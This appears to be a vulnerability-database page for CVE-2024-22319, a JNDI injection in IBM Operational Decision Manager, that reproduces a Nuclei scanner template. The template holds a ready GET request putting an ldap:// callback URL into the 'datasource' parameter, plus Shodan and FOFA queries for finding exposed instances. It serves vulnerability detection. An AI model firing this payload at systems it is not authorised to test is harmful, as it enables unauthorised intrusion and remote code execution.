Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-22319
HistoryFeb 22, 2024 - 11:26 a.m.

IBM Operational Decision Manager - JNDI Injection

2024-02-2211:26:22
ProjectDiscovery
github.com
39
cve
ibm
operational_decision_manager
decision-manager
jndi
jsf
rce
remote code execution
vulnerability

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.1 High

AI Score

Confidence

High

0.347 Low

EPSS

Percentile

97.1%

IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API.  IBM X-Force ID:  279145.
id: CVE-2024-22319

info:
  name: IBM Operational Decision Manager - JNDI Injection
  author: DhiyaneshDK
  severity: critical
  description: |
    IBM Operational Decision Manager 8.10.3, 8.10.4, 8.10.5.1, 8.11, 8.11.0.1, and 8.12.0.1 is susceptible to remote code execution attack via JNDI injection when passing an unchecked argument to a certain API.  IBM X-Force ID:  279145.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-22319
    cwe-id: CWE-74
    epss-score: 0.29329
    epss-percentile: 0.96896
    cpe: cpe:2.3:a:ibm:operational_decision_manager:8.10.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ibm
    product: operational_decision_manager
    shodan-query:
      - html:"IBM ODM"
      - http.html:"ibm odm"
    fofa-query:
      - title="IBM ODM"
      - title="ibm odm"
      - body="ibm odm"
  tags: cve,cve2024,ibm,odm,decision-manager,jndi,jsf,rce

http:
  - method: GET
    path:
      - "{{BaseURL}}/decisioncenter-api/v1/about?datasource=ldap://{{interactsh-url}}"

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, "dns")
          - 'contains(header, "application/json")'
          - 'contains(body, "patchLevel\":")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100d8191ca66f6400061c6b59b356a53ce3b95da2f03775b47440ed93a01753a41c022100c889c9b69b82421a875219849c974134fc1444ae169eb208b85fa7100c78dff2:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.1 High

AI Score

Confidence

High

0.347 Low

EPSS

Percentile

97.1%

Related for NUCLEI:CVE-2024-22319